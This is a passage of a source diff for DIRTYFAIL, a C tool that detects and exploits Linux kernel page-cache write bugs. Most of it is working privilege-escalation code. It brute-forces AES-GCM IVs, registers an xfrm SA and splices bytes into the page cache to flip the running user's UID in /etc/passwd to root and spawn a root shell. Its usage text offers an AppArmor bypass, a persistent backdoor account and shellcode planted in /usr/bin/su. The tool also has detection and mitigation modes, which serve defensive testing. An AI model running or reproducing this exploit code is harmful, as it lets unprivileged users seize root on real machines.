if (p) log_step("getpwnam('%s').pw_uid = %u", user, p->pw_uid);
if (!do_shell) {
if (dirtyfail_no_revert) {
log_warn("--no-revert: leaving page cache poisoned (run "
"`dirtyfail --cleanup` or reboot to revert)");
return DF_EXPLOIT_OK;
}
log_hint("--no-shell selected; reverting page cache");
if (try_revert_passwd_page_cache())
log_ok("page cache reverted");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' — enter your own password to drop into a root shell",
user);
log_hint("after exit, run DIRTYFAIL --cleanup or reboot");
execlp("su", "su", user, (char *)NULL);
log_bad("execlp su: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
+33
View File
@@ -0,0 +1,33 @@
/*
* DIRTYFAIL — copyfail.h
*
* Public surface for the Copy Fail (CVE-2026-31431) module.
*/
#ifndef DIRTYFAIL_COPYFAIL_H
#define DIRTYFAIL_COPYFAIL_H
#include "common.h"
/* Run all preflight checks and the sentinel-file primitive probe.
* Never modifies system files. */
df_result_t copyfail_detect(void);
/* Real PoC: flip the running user's 4-digit UID in /etc/passwd page
* cache to "0000" and (optionally) execve `su <user>` to drop a root
* shell. `do_shell` controls whether to invoke su; if false, the patch
* is reverted via POSIX_FADV_DONTNEED before returning so the system
* does not stay in a broken state. */
df_result_t copyfail_exploit(bool do_shell);
/* Low-level building block: write 4 bytes into the page cache of
* `target_path` at `target_off`. Caller must have read access to
* the file. Same primitive that copyfail_exploit uses internally;
* exposed for exploit_su.c to chain ~12 calls into a 48-byte
* shellcode plant against /usr/bin/su. Returns true if the AF_ALG
* sequence completed; caller MUST verify via re-read. */
bool cf_4byte_write(const char *target_path,
off_t target_off,
const unsigned char four_bytes[4]);
#endif
+634
View File
@@ -0,0 +1,634 @@
/*
* DIRTYFAIL — copyfail_gcm.c
*
* See copyfail_gcm.h for the design notes. This file implements:
*
* 1. AES-GCM keystream byte 0 computation via AF_ALG `gcm(aes)`.
* 2. IV brute force until keystream[0] equals the desired XOR mask.
* 3. SA installation via `ip xfrm state add ...` (system(3) — saves
* ~150 lines of netlink boilerplate vs. our authencesn path; the
* gcm primitive is the right place to take that dep, and every
* modern distro ships iproute2).
* 4. Splice trigger: ESP wire header (16B) + 1 target byte + 16-byte
* ICV pad. The kernel's in-place GCM decrypt XORs keystream[0]
* onto the spliced page-cache byte, which is what we control.
*/
#include "copyfail_gcm.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <stdarg.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifdef __linux__
#include <sched.h>
#include <sys/syscall.h>
#include <linux/if.h>
#include <sys/ioctl.h>
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
size_t len, unsigned int flags);
#endif
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#define ENCAP_PORT 4500
#define ESP_SPI 0xCAFEBABE
#define IV_LEN 8
#define ICV_LEN 16
#define AES_KEY_LEN 16
#define SALT_LEN 4
#define KEY_TOTAL (AES_KEY_LEN + SALT_LEN) /* rfc4106 expects 20 */
/* Fixed AEAD key (16-byte AES key + 4-byte salt). Both are attacker-
* chosen — auth verification will fail at the end of decrypt anyway,
* the STORE has already happened by then. */
__attribute__((unused))
static const unsigned char AEAD_KEY[KEY_TOTAL] = {
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f,
0x10, 0x11, 0x12, 0x13,
};
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t copyfail_gcm_detect(void)
{
log_step("Copy Fail GCM variant — detection");
int km, kn;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x", km, kn);
/* Probe AF_ALG availability of rfc4106(gcm(aes)). */
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (s < 0) {
log_ok("AF_ALG unavailable — GCM variant unreachable");
return DF_PRECOND_FAIL;
}
struct sockaddr_alg_compat sa = { .salg_family = AF_ALG };
strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1);
strncpy((char *)sa.salg_name, "rfc4106(gcm(aes))", sizeof(sa.salg_name) - 1);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
log_ok("rfc4106(gcm(aes)) not loadable — GCM variant unreachable");
close(s);
return DF_PRECOND_FAIL;
}
close(s);
log_ok("AF_ALG + rfc4106(gcm(aes)) loadable");
bool userns = unprivileged_userns_allowed();
log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");
if (!userns) {
log_warn("preconditions partial — userns blocked. Try with --aa-bypass.");
return DF_PRECOND_FAIL;
}
if (apparmor_userns_caps_blocked()) {
log_ok("LSM-mitigated — unprivileged userns lacks caps; xfrm SA install "
"via `ip xfrm` requires CAP_NET_ADMIN that the AA policy denies.");
return DF_PRECOND_FAIL;
}
if (dirtyfail_active_probes) {
log_step("--active set: firing rfc4106(gcm) trigger against /tmp sentinel");
df_result_t pr = copyfail_gcm_active_probe();
if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr;
log_warn("active probe inconclusive — falling back to precondition verdict");
}
log_warn("VULNERABLE — GCM-variant of xfrm-ESP page-cache write reachable");
log_warn("apply mainline patch f4c50a4034e6 or distro backport");
log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
return DF_VULNERABLE;
}
/* ---------------------------------------------------------------- *
* AES-GCM keystream byte 0 — computed via AF_ALG `ecb(aes)` instead
* of `aead gcm(aes)`.
*
* BACKGROUND
* ----------
* Originally we used AF_ALG `aead` `gcm(aes)`: bind, set key + tag size,
* sendmsg with assoclen=0 + 1-byte zero plaintext, read back 17 bytes
* of (ciphertext || tag). The first byte of the output IS the keystream
* byte we want (since pt=0 means ct = ks XOR 0 = ks).
*
* That worked in unit tests on some kernels but on Ubuntu 24.04 / 6.8
* the read() blocks indefinitely — the 1-byte AEAD plaintext doesn't
* produce output until additional data is sent or the socket is shut
* down. Tracking down the exact "what does this kernel want" was a rat
* hole.
*
* Instead, we compute keystream byte 0 directly. Per NIST SP 800-38D,
* GCM with a 12-byte nonce derives the initial counter as
* J0 = nonce || 0x00000001
* and the counter for the first plaintext block is J0 + 1 =
* nonce || 0x00000002
* The keystream block is E_K(that counter), so:
* keystream[0] = AES-128-ECB(K, nonce || 0x00000002)[0]
*
* AF_ALG `ecb(aes)` is bulletproof — single-block in, single-block out,
* no MSG_MORE / shutdown semantics to get wrong. ~6 µs per call on a
* 4-core VM, vs ~50 µs for the AEAD path that didn't actually work.
*
* (cf2's copyfail2.c uses OpenSSL EVP_aes_128_gcm to do the same
* computation indirectly. We avoid the libssl dependency by going
* through AF_ALG ECB directly.)
* ---------------------------------------------------------------- */
#ifdef __linux__
static int gcm_open(void)
{
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (s < 0) return -1;
struct sockaddr_alg_compat sa = { .salg_family = AF_ALG };
strncpy((char *)sa.salg_type, "skcipher", sizeof(sa.salg_type) - 1);
strncpy((char *)sa.salg_name, "ecb(aes)", sizeof(sa.salg_name) - 1);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
close(s); return -1;
}
if (setsockopt(s, SOL_ALG, ALG_SET_KEY,
AEAD_KEY, AES_KEY_LEN) < 0) { /* AES-128 key */
close(s); return -1;
}
return s;
}
/* Compute byte 0 of the GCM keystream for the given 12-byte nonce by
* ECB-encrypting the counter block (nonce || 0x00000002). */
static bool gcm_keystream_byte0(int ecb_s, const uint8_t nonce[12],
uint8_t *out_byte)
{
int op = accept(ecb_s, NULL, NULL);
if (op < 0) return false;
/* Counter block: J0 + 1 = nonce(12) || 0x00000002. The +1 is
* because GCM reserves J0 itself for the auth-tag XOR, so the
* first plaintext block uses J0+1. */
uint8_t block[16];
memcpy(block, nonce, 12);
block[12] = 0; block[13] = 0; block[14] = 0; block[15] = 2;
char cbuf[CMSG_SPACE(sizeof(unsigned int))] = {0};
unsigned int op_enc = ALG_OP_ENCRYPT;
struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) };
struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
c->cmsg_level = SOL_ALG;
c->cmsg_type = ALG_SET_OP;
c->cmsg_len = CMSG_LEN(sizeof(unsigned int));
memcpy(CMSG_DATA(c), &op_enc, sizeof(op_enc));
struct iovec iov = { .iov_base = block, .iov_len = 16 };
msg.msg_iov = &iov; msg.msg_iovlen = 1;
if (sendmsg(op, &msg, 0) != 16) { close(op); return false; }
uint8_t out[16];
ssize_t n = read(op, out, 16);
close(op);
if (n != 16) return false;
*out_byte = out[0];
return true;
}
/* Brute force IV until keystream byte equals want_ks. Returns iters
* tried; writes the winning 8-byte IV into iv_out. */
static int64_t gcm_brute_iv(uint8_t want_ks, uint8_t iv_out[IV_LEN])
{
int s = gcm_open();
if (s < 0) {
log_bad("gcm_open: %s", strerror(errno));
return -1;
}
uint8_t nonce[12];
memcpy(nonce, AEAD_KEY + AES_KEY_LEN, SALT_LEN); /* salt prefix */
for (uint64_t v = 1; v < (1ULL << 32); v++) {
memcpy(nonce + SALT_LEN, &v, IV_LEN); /* low 8 bytes */
uint8_t ks;
if (!gcm_keystream_byte0(s, nonce, &ks)) {
close(s);
return -1;
}
if (ks == want_ks) {
memcpy(iv_out, &v, IV_LEN);
close(s);
return (int64_t)v;
}
if ((v & 0xFFF) == 0 && v > 16384) {
/* progress hint after 16k attempts (very unlucky case). */
log_hint("gcm IV brute: %llu trials so far...",
(unsigned long long)v);
}
}
close(s);
return -1;
}
/* ---------------------------------------------------------------- *
* SA install via `ip xfrm state add ...`
* ---------------------------------------------------------------- */
static bool ip_run(const char *fmt, ...)
{
char cmd[2048];
va_list ap;
va_start(ap, fmt);
vsnprintf(cmd, sizeof(cmd), fmt, ap);
va_end(ap);
int rc = system(cmd);
return rc == 0;
}
static bool gcm_install_sa(const uint8_t iv[IV_LEN])
{
char keyhex[KEY_TOTAL * 2 + 3];
char *p = keyhex;
p += sprintf(p, "0x");
for (int i = 0; i < KEY_TOTAL; i++)
p += sprintf(p, "%02x", AEAD_KEY[i]);
/* `ip xfrm state add` registers a transport-mode ESP SA over
* loopback with rfc4106(gcm(aes)) AEAD. Encap is ESPINUDP/4500
* matching what we'll send via splice. */
(void)iv; /* IV travels in the wire packet, not the SA. */
return ip_run(
"ip link set lo up >/dev/null 2>&1 ; "
"ip xfrm state flush >/dev/null 2>&1 ; "
"ip xfrm state add src 127.0.0.1 dst 127.0.0.1 proto esp "
"spi 0x%08x encap espinudp %d %d 0.0.0.0 "
"aead 'rfc4106(gcm(aes))' %s 128 replay-window 32 >/dev/null 2>&1",
ESP_SPI, ENCAP_PORT, ENCAP_PORT, keyhex);
}
/* ---------------------------------------------------------------- *
* Splice trigger
* ---------------------------------------------------------------- */
static bool gcm_trigger(const char *target_path, off_t target_off,
const uint8_t iv[IV_LEN])
{
int rs = socket(AF_INET, SOCK_DGRAM, 0);
if (rs < 0) return false;
int encap = UDP_ENCAP_ESPINUDP;
setsockopt(rs, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap));
struct sockaddr_in la = {
.sin_family = AF_INET,
.sin_port = htons(ENCAP_PORT),
.sin_addr.s_addr = htonl(INADDR_LOOPBACK),
};
int reuse = 1;
setsockopt(rs, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
if (bind(rs, (struct sockaddr *)&la, sizeof(la)) < 0) {
close(rs); return false;
}
/* Build attacker page in /tmp: ESP header(16) + ICV pad at offset
* 4096. We splice these from a real file so the kernel sees them
* as page-cache pages on the splice path. */
char atkpath[64];
snprintf(atkpath, sizeof(atkpath), "/tmp/dirtyfail-gcm.%d", (int)getpid());
unlink(atkpath);
int afd = open(atkpath, O_RDWR | O_CREAT | O_EXCL, 0600);
if (afd < 0) { close(rs); return false; }
unsigned char esp_hdr[16];
*(uint32_t *)(esp_hdr + 0) = htonl(ESP_SPI);
*(uint32_t *)(esp_hdr + 4) = htonl(1); /* SeqNum */
memcpy(esp_hdr + 8, iv, IV_LEN);
if (pwrite(afd, esp_hdr, 16, 0) != 16) goto fail;
unsigned char icv[ICV_LEN] = {0};
if (pwrite(afd, icv, ICV_LEN, 4096) != ICV_LEN) goto fail;
fsync(afd);
#ifdef POSIX_FADV_DONTNEED
posix_fadvise(afd, 0, 0, POSIX_FADV_DONTNEED);
#endif
int afd2 = open(atkpath, O_RDONLY);
if (afd2 < 0) goto fail;
unlink(atkpath);
int tfd = open(target_path, O_RDONLY);
if (tfd < 0) { close(afd2); goto fail; }
int p[2];
if (pipe(p) < 0) { close(afd2); close(tfd); goto fail; }
fcntl(p[0], F_SETPIPE_SZ, 1 << 20);
fcntl(p[1], F_SETPIPE_SZ, 1 << 20);
/* esp_hdr (16) || target_byte (1) || icv_pad (16) — 33 bytes total. */
loff_t off;
off = 0; if (splice(afd2, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) goto trig_fail;
off = target_off; if (splice(tfd, &off, p[1], NULL, 1, SPLICE_F_MOVE) != 1) goto trig_fail;
off = 4096; if (splice(afd2, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) goto trig_fail;
int ss = socket(AF_INET, SOCK_DGRAM, 0);
if (ss < 0) goto trig_fail;
if (connect(ss, (struct sockaddr *)&la, sizeof(la)) < 0) { close(ss); goto trig_fail; }
ssize_t sent = splice(p[0], NULL, ss, NULL, 16 + 1 + 16, SPLICE_F_MOVE);
(void)sent;
close(ss);
close(p[0]); close(p[1]);
/* Wait for esp_input to finish the in-place STORE before we
* tear down sockets. 150ms matches V4bel's reference; 50ms was
* working on x86 lab kernels but tight on ARM64 / loaded VMs. */
usleep(150 * 1000);
unsigned char drain[256];
(void)recv(rs, drain, sizeof(drain), MSG_DONTWAIT);
close(afd2); close(tfd); close(afd); close(rs);
return true;
trig_fail:
close(p[0]); close(p[1]); close(afd2); close(tfd);
fail:
close(afd); close(rs);
unlink(atkpath);
return false;
}
/* ---------------------------------------------------------------- *
* Public 1-byte primitive
* ---------------------------------------------------------------- */
bool cfg_1byte_write(const char *target_path,
off_t target_off, unsigned char want_byte)
{
/* Read current byte. */
int tfd = open(target_path, O_RDONLY);
if (tfd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
return false;
}
unsigned char cur = 0;
if (pread(tfd, &cur, 1, target_off) != 1) {
log_bad("pread current: %s", strerror(errno));
close(tfd); return false;
}
close(tfd);
if (cur == want_byte) {
return true; /* already what we want */
}
uint8_t want_ks = cur ^ want_byte;
log_step("cfg_1byte_write off=%lld 0x%02x -> 0x%02x (need_ks=0x%02x)",
(long long)target_off, cur, want_byte, want_ks);
/* Brute force IV via AF_ALG. */
uint8_t iv[IV_LEN];
int64_t iters = gcm_brute_iv(want_ks, iv);
if (iters < 0) {
log_bad("gcm IV brute force failed (want_ks=0x%02x)", want_ks);
return false;
}
log_step(" IV found in %lld iters", (long long)iters);
/* Install SA. */
if (!gcm_install_sa(iv)) {
log_bad("ip xfrm state add failed");
return false;
}
log_step(" SA installed");
/* Trigger. */
if (!gcm_trigger(target_path, target_off, iv)) {
log_bad("gcm trigger failed");
return false;
}
log_step(" trigger fired");
/* Verify. */
int v = open(target_path, O_RDONLY);
if (v < 0) return false;
unsigned char post = 0;
if (pread(v, &post, 1, target_off) != 1) { close(v); return false; }
close(v);
if (post != want_byte) {
log_bad("byte at off=%lld is 0x%02x, wanted 0x%02x",
(long long)target_off, post, want_byte);
return false;
}
return true;
}
#else /* !__linux__ */
bool cfg_1byte_write(const char *p, off_t o, unsigned char b)
{ (void)p; (void)o; (void)b; return false; }
#endif
/* ---------------------------------------------------------------- *
* Top-level exploit (UID flip end-to-end)
* ---------------------------------------------------------------- */
/* INNER (bypass userns): cfg_1byte_write × 4 to flip UID digits to '0'. */
df_result_t copyfail_gcm_exploit_inner(void)
{
#ifdef __linux__
const char *user = getenv("DIRTYFAIL_TARGET_USER");
if (!user || !*user) {
log_bad("inner: DIRTYFAIL_TARGET_USER not set");
return DF_TEST_ERROR;
}
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("inner: find_passwd_uid_field('%s') failed", user);
return DF_TEST_ERROR;
}
if (uid_len != 4) {
log_bad("inner: UID '%s' not 4 chars", uid_str);
return DF_TEST_ERROR;
}
for (size_t i = 0; i < 4; i++) {
if (uid_str[i] == '0') continue;
log_step("inner: flip /etc/passwd[%lld] '%c' -> '0'",
(long long)(uid_off + i), uid_str[i]);
if (!cfg_1byte_write("/etc/passwd", uid_off + i, '0')) {
log_bad("inner: byte flip failed at offset %lld",
(long long)(uid_off + i));
return DF_EXPLOIT_FAIL;
}
}
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
/* OUTER (init ns): prompts → fork bypass child → wait → verify → su. */
df_result_t copyfail_gcm_exploit(bool do_shell)
{
log_step("Copy Fail GCM variant — exploit");
uid_t target_uid = getuid();
if (target_uid == 0) {
log_warn("already root in init namespace");
return DF_OK;
}
struct passwd *pw = getpwuid(target_uid);
if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
const char *user = pw->pw_name;
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("user %s not found in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd UID for %s: '%s' at offset %lld",
user, uid_str, (long long)uid_off);
if (uid_len != 4) {
log_bad("UID '%s' is %zu chars; need 4", uid_str, uid_len);
return DF_TEST_ERROR;
}
log_warn("about to flip /etc/passwd UID via rfc4106(gcm(aes)) byte-flips");
log_warn("(four 1-byte writes — one per UID digit not already '0')");
if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; }
if (!ssh_lockout_check(user)) { log_bad("ssh-lockout declined"); return DF_OK; }
setenv("DIRTYFAIL_INNER_MODE", "gcm", 1);
setenv("DIRTYFAIL_TARGET_USER", user, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
if (rc != DF_EXPLOIT_OK) {
log_bad("inner exploit failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
/* Verify in init ns */
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) return DF_EXPLOIT_FAIL;
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, "0000", 4) != 0) {
log_bad("verify: page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0 (via GCM path)", user);
if (!do_shell) {
if (try_revert_passwd_page_cache())
log_ok("page cache reverted (--no-shell)");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' in init ns — enter your password for REAL root", user);
execlp("su", "su", user, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* ---------------------------------------------------------------- *
* Active probe — `--scan --active`.
*
* Install GCM SA with an arbitrary IV and fire ONE trigger against a
* /tmp sentinel. We skip the IV brute force: keystream XOR ciphertext
* is unpredictable but ANY byte change at sentinel[0] proves the
* kernel ran the in-place STORE.
* ---------------------------------------------------------------- */
df_result_t copyfail_gcm_active_probe_inner(void)
{
#ifdef __linux__
const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
if (!sentinel || !*sentinel) {
log_bad("gcm-probe: DIRTYFAIL_PROBE_SENTINEL not set");
return DF_TEST_ERROR;
}
/* Arbitrary fixed 8-byte wire IV (rfc4106 wraps it with the 4-byte
* SA salt to form the 12-byte GCM nonce). Keystream is deterministic
* given this IV + key, but we don't need to predict it for the
* probe — any byte change in sentinel[0] proves the STORE happened. */
static const uint8_t probe_iv[IV_LEN] = {
0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x02, 0x03, 0x04
};
if (!gcm_install_sa(probe_iv)) {
log_bad("gcm-probe: ip xfrm state add failed");
return DF_TEST_ERROR;
}
if (!gcm_trigger(sentinel, 0, probe_iv)) {
log_bad("gcm-probe: trigger failed");
return DF_TEST_ERROR;
}
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
df_result_t copyfail_gcm_active_probe(void)
{
char tmpl[] = "/tmp/dirtyfail-gcm-probe.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("gcm-probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(sfd);
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(rfd);
setenv("DIRTYFAIL_INNER_MODE", "gcm-probe", 1);
setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
unsetenv("DIRTYFAIL_INNER_MODE");
unsetenv("DIRTYFAIL_PROBE_SENTINEL");
if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
if (rc != DF_EXPLOIT_OK) {
log_bad("gcm-probe inner failed (exit=%d)", rc);
unlink(tmpl); return DF_TEST_ERROR;
}
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[16];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return DF_TEST_ERROR;
if (after[0] != 'A') {
log_warn("ACTIVE PROBE gcm: sentinel[0] changed 'A' → 0x%02x → kernel is VULNERABLE",
after[0]);
return DF_VULNERABLE;
}
log_ok("ACTIVE PROBE gcm: sentinel[0] intact — kernel rfc4106 path appears patched");
return DF_OK;
}
+61
View File
@@ -0,0 +1,61 @@
/*
* DIRTYFAIL — copyfail_gcm.h
*
* Single-byte page-cache write via xfrm-ESP `rfc4106(gcm(aes))` AEAD.
*
* This module is a sibling primitive to copyfail.c (4-byte authencesn
* STORE) and dirtyfrag_esp.c (4-byte authencesn STORE via XFRM). It
* targets the SAME bug class (CVE-2026-43284 xfrm-ESP no-COW path),
* but uses `rfc4106(gcm(aes))` instead of `authencesn(...)` as the
* AEAD. That changes the primitive in two useful ways:
*
* 1. Coverage. A defender who blacklisted only `algif_aead` to stop
* Copy Fail (CVE-2026-31431) is still vulnerable here — neither
* algif_aead nor the authencesn template is on the path.
*
* 2. Granularity. AES-GCM is a counter-mode cipher; in-place
* "decryption" is just XORing the keystream onto the spliced
* page byte. We can land an arbitrary single byte at any file
* offset (no 4-byte alignment, no 4-byte side-effects) by
* brute-forcing the IV until keystream[0] equals
* `target_byte XOR desired_byte`.
*
* The 1-byte primitive is what makes the persistent backdoor mode
* (`backdoor.c`) feasible without alignment juggling.
*
* Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
* (`copyfail2.c`), reimplemented here in DIRTYFAIL style.
*/
#ifndef DIRTYFAIL_COPYFAIL_GCM_H
#define DIRTYFAIL_COPYFAIL_GCM_H
#include "common.h"
/* Detection: kernel + esp4 + rfc4106(gcm(aes)) availability + userns. */
df_result_t copyfail_gcm_detect(void);
/* End-to-end PoC: flip /etc/passwd UID via rfc4106(gcm(aes)) STORE.
* Equivalent functional outcome to copyfail_exploit() and
* dirtyfrag_esp_exploit() — different kernel path. */
df_result_t copyfail_gcm_exploit(bool do_shell);
df_result_t copyfail_gcm_exploit_inner(void);
/* Low-level building block exposed for backdoor.c:
* write a single byte at `target_path` offset `target_off`. The caller
* MUST already be inside a fresh user namespace with CAP_NET_ADMIN
* (ESP SA registration prerequisite). Returns true on apparent
* success — caller verifies via re-read. */
bool cfg_1byte_write(const char *target_path,
off_t target_off,
unsigned char desired_byte);
/* Active probe: installs a GCM SA with arbitrary IV, fires ONE
* gcm_trigger against a /tmp sentinel. Skips IV brute force entirely;
* the kernel STORE writes an unpredictable byte (keystream XOR 'A')
* which still confirms the path is reachable. Returns DF_VULNERABLE
* on byte change, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
df_result_t copyfail_gcm_active_probe(void);
df_result_t copyfail_gcm_active_probe_inner(void);
#endif
+475
View File
@@ -0,0 +1,475 @@
/*
* DIRTYFAIL — main entry point
*
* A single binary that detects and (with explicit consent) demonstrates
* exploitation of:
*
* - Copy Fail CVE-2026-31431
* - Dirty Frag (xfrm-ESP) CVE-2026-43284
* - Dirty Frag (RxRPC) CVE-2026-43500
*
* Default mode is detection. The exploit modes never run without
* --exploit on the command line *and* a typed-string confirmation at
* runtime.
*
* Exit codes:
* 0 not vulnerable (or: exploit succeeded — semantically "you can
* now type `exit` and the test ran")
* 1 test error / could not determine
* 2 vulnerable
* 3 exploit attempted but did not land
* 4 preconditions not met (effectively "not vulnerable here")
* 5 exploit succeeded and a root shell was spawned
*/
#include "common.h"
#include "copyfail.h"
#include "copyfail_gcm.h"
#include "dirtyfrag_esp.h"
#include "dirtyfrag_esp6.h"
#include "dirtyfrag_rxrpc.h"
#include "apparmor_bypass.h"
#include "backdoor.h"
#include "mitigate.h"
#include "exploit_su.h"
#include <getopt.h>
#include <fcntl.h>
#include <sys/utsname.h>
static const char BANNER[] =
"\n"
" ██████╗ ██╗██████╗ ████████╗██╗ ██╗███████╗ █████╗ ██╗██╗ \n"
" ██╔══██╗██║██╔══██╗╚══██╔══╝╚██╗ ██╔╝██╔════╝██╔══██╗██║██║ \n"
" ██║ ██║██║██████╔╝ ██║ ╚████╔╝ █████╗ ███████║██║██║ \n"
" ██║ ██║██║██╔══██╗ ██║ ╚██╔╝ ██╔══╝ ██╔══██║██║██║ \n"
" ██████╔╝██║██║ ██║ ██║ ██║ ██║ ██║ ██║██║███████╗ \n"
" ╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝ \n"
" Copy Fail + Dirty Frag detector & PoC\n"
" CVE-2026-31431 / 43284 / 43500\n";
static void usage(const char *prog)
{
fprintf(stderr,
"Usage: %s [MODE] [OPTIONS]\n"
"\n"
"Modes (pick one; default is --scan):\n"
" --scan detect all three CVEs (no system modification)\n"
" --check-copyfail Copy Fail (CVE-2026-31431) detection only\n"
" --check-esp Dirty Frag xfrm-ESP (CVE-2026-43284) detection only\n"
" --check-rxrpc Dirty Frag RxRPC (CVE-2026-43500) detection only\n"
" --check-esp6 IPv6 xfrm-ESP path (CVE-2026-43284 v6) detection\n"
" --check-gcm Copy Fail GCM variant detection\n"
" --exploit-copyfail real PoC: flip /etc/passwd UID via algif_aead\n"
" --exploit-esp real PoC: flip /etc/passwd UID via xfrm-ESP (v4)\n"
" --exploit-esp6 real PoC: flip /etc/passwd UID via xfrm-ESP (v6)\n"
" --exploit-rxrpc real PoC: empty /etc/passwd root pwd via rxkad\n"
" (fcrypt brute-force + AF_RXRPC handshake forgery)\n"
" --exploit-gcm real PoC: flip /etc/passwd UID via rfc4106(gcm(aes))\n"
" single-byte primitive (works when authencesn is\n"
" blacklisted but rfc4106 isn't)\n"
" --exploit-backdoor PERSISTENT: insert dirtyfail::0:0:..:/:/bin/bash\n"
" into /etc/passwd page cache; survives shell exit\n"
" until page eviction. Use --cleanup-backdoor to revert.\n"
" --exploit-su V4bel-style: plant arch-specific shellcode at\n"
" /usr/bin/su entry point in page cache; running\n"
" su then yields a /bin/sh root shell. No PAM\n"
" dependency. x86_64 tested; aarch64 ships but is\n"
" hardware-untested (gated behind an env var).\n"
" Saves original entry-point bytes to\n"
" /var/tmp/.dirtyfail-su.state for revert via\n"
" --cleanup-su.\n"
" --cleanup evict /etc/passwd from page cache and drop_caches\n"
" --cleanup-backdoor restore /etc/passwd line from /var/tmp/.dirtyfail.state\n"
" --cleanup-su restore /usr/bin/su entry-point bytes from state file\n"
" --list-state report what (if anything) is currently planted —\n"
" reads /var/tmp/.dirtyfail*.state files and\n"
" describes each. Side-effect free.\n"
" --mitigate DEFENSIVE: blacklist algif_aead/esp4/esp6/rxrpc,\n"
" set apparmor_restrict_unprivileged_userns=1.\n"
" Requires root. Side-effect: breaks IPsec/AFS.\n"
" --cleanup-mitigate remove the modprobe/sysctl mitigation files\n"
" --version print version\n"
" --help this message\n"
"\n"
"Options:\n"
" --active in --scan / --check-* mode, do an active sentinel\n"
" STORE probe per CVE in addition to precondition\n"
" checks. Modifies /tmp sentinels only; never\n"
" touches /etc/passwd. Requires AA bypass on\n"
" hardened distros, so may take ~5-10s.\n"
" --no-shell after a successful exploit, do NOT execve `su`;\n"
" instead revert the page-cache patch and exit\n"
" --no-revert with --no-shell, also skip the auto-revert\n"
" (leaves the page cache poisoned — used by\n"
" tools/dirtyfail-container-escape.sh demo)\n"
" --json emit a single JSON object on stdout (--scan\n"
" only); all log output redirected to stderr.\n"
" Suitable for SIEM/fleet scanning. Implies\n"
" --no-color and suppresses the banner.\n"
" --no-color disable ANSI color in output\n"
